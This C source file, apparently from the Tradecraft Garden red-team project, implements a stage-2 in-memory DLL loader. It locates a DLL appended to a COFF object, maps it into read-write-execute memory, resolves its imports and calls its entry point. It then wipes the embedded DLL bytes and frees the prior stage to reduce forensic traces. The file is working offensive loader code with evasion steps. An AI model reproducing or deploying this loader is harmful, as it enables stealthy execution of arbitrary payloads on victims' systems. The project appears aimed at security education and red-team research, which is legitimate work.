/*
 * Copyright (C) 2025 Raphael Mudge, Adversary Fan Fiction Writers Guild
 *
 * This file is part of Tradecraft Garden
 *
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; either version 2 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 *  You should have received a copy of the GNU General Public License along
 *  with this program; if not, see <https://www.gnu.org/licenses/>.
 */

#include "loaderdefs.h"
#include "loader.h"

WINBASEAPI DECLSPEC_NORETURN VOID WINAPI KERNEL32$ExitThread (DWORD dwExitCode);

/*
 * This is the Crystal Palace convention for getting ahold of data linked with this COFF.
 *
 * Notice, we're executing from a COFF context, so we don't need to do any different
 * weirdness between x86 and x64. They'll both work the same here.
 */
char __DLLDATA__[0] __attribute__((section("my_data")));

char * findAppendedDLL() {
	return (char *)&__DLLDATA__;
}

typedef struct {
        int   length;
        char  value[];
} _RESOURCE;

/*
 * Ahhhh.... so MUCH easier than writing PIC
 */
void go(char * stage1ptr) {
	char       * dst;
	_RESOURCE  * dllsrc;
	DLLDATA      data;
	IMPORTFUNCS  funcs;
	DLLMAIN_FUNC entry;

	/* find our DLL appended to this COFF */
	dllsrc = (_RESOURCE *)findAppendedDLL();

	/* resolve some needed function pointers */
	funcs.GetProcAddress = GetProcAddress;
	funcs.LoadLibraryA   = LoadLibraryA;

	/* parse our DLL! */
	ParseDLL(dllsrc->value, &data);

	/* allocate memory for it! */
	dst = VirtualAlloc( NULL, SizeOfDLL(&data), MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE );

	/* load the damned thing */
	LoadDLL(&data, dllsrc->value, dst);

	/* process the imports */
	ProcessImports(&funcs, &data, dst);

	/* grab our entry point, the last info we need from dllsrc */
	entry = ( EntryPoint(&data, dst) );

	/* OK, the way I've done things here, our DLL data is LINKED to this COFF and it was put into the RW memory
	 * with this COFF's other global variables (and function table too). We can't free() it. But, we can zero it
	 * out and that's what we're going to do here. stage1 could have extracted the DLL as a separate resource
	 * and then we could have freed that, but I'm playing with making this modular. So, this is what I got. */
	__stosb((unsigned char *)dllsrc->value, 0, dllsrc->length);

	/* let's free our Stage 1 too */
	VirtualFree(stage1ptr, 0, MEM_RELEASE);

	/* run our DLL */
	entry ((HINSTANCE)dst, DLL_PROCESS_ATTACH, NULL);

	/* and, because we can't "return" to our stage 1, let's exit this thread */
	KERNEL32$ExitThread(0);
}
